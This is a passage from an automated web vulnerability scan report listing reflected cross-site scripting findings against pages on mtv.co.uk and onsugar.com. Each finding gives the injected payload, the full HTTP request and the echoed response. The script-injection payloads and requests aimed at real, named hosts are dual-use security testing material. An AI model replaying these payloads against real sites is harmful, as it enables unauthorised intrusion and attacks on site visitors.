User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:57 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:58 GMT
Date: Mon, 12 Sep 2011 12:49:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.115. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b14d0"-alert(1)-"2105664c6ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:32 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:32 GMT
Date: Mon, 12 Sep 2011 12:50:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.116. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/blackberry.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/blackberry.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfba0"-alert(1)-"2c6339de47 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13429
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:37 GMT
Date: Mon, 12 Sep 2011 12:50:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.117. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/bodyform.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/bodyform.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff1e"-alert(1)-"e7d91e0ee6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.118. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/nokiaSessions.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/nokiaSessions.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88536"-alert(1)-"237f981c1a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.119. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/seat.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/seat.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2b51"-alert(1)-"b39b60171d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:41 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:41 GMT
Date: Mon, 12 Sep 2011 12:50:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.120. http://www.mtv.co.uk/sites/all/themes/mtvuk/subthemes/default_homepage/style.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/subthemes/default_homepage/style.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8a26"-alert(1)-"fe7e87ae90 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90?1236968319 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:04 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13467
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:04 GMT
Date: Mon, 12 Sep 2011 12:50:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.121. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b038"-alert(1)-"d884786df1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/facebook_connect/4b038"-alert(1)-"d884786df1d HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832637%7CniqThxHrFM6F9um5QMGO0Ha%2F900oOKaea4pFhHEg4fO%2BNyXxQL5KKlHaibhzlVJ9UAEElI6baYteQrbTmlbjWhBTc7kk9vrEDtgGCkCuGSH0545XXfw14KzbHDFnWXT%2B9GpovDipRdhalTg4v5aLt%2BbYGO8otzFEahOJ8nzQ6f3X4cS6fS%2FhDLpvmR%2Fj8BUhKyvPN%2B5kKDVxMtlnpFevWQ%3D%3D%7C440dec8fa777e1eb7ee9a1eda4d09f02ca35174c; expires=Wed, 05-Oct-2011 16:37:17 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:57 GMT
Server: lighttpd/1.4.26
Content-Length: 7693

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/modules/facebook_connect/4b038"-alert(1)-"d884786df1d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.122. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53383"><script>alert(1)</script>15a9ee32b04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04 HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832636%7CnrCFFU5HiGaDcKE22GGcSWnNcIXj2hbzsDv2wu7rlIzzk6DwOI%2FLfUo46NrmlZik4ydq1Il8xCtLWdfstVMAyq%2B%2Baj4E7u%2FAFq9%2B6eHrUycU9M3q%2BIoJrxeOSJv94nqYJSjuszq6LHAUaKfixPBP8FbgPE%2FcknrtnYYHv5hOL0cyj6dyCLRY6WECpUvGWHOyX3w1ixrbGh2FODyUaJ6lSg%3D%3D%7Cd0d75e3d96806545c20a7ac291cd8c7aa2a1fc20; expires=Wed, 05-Oct-2011 16:37:16 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.123. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d96"><script>alert(1)</script>5c26a4aba3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832641%7Ca%2FtbvUs37Q9DtUqtr%2FBY3wsoFZJ6tC9NYob5X2Hi3sLWq8cjORAu%2F8ZB6BMvJLztS9GxF6JhuR7nQ%2Fu38AAUtGFZrcUBzXuKKwab%2BN8v0JA9dJUdmzea5V3Vqao0laNl46FCxLHMqi8ODVZ9YD9Dv%2BF%2BTKE8qe4M8bIYddu2FEq1UAb1ff16kYc0rK3AkJUtB5qwifdNRLN7dcmDG9d9vQ%3D%3D%7C4dc22acb678517f2a04aa1e67a1c489fc827297f; expires=Wed, 05-Oct-2011 16:37:21 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:01 GMT
Server: lighttpd/1.4.26
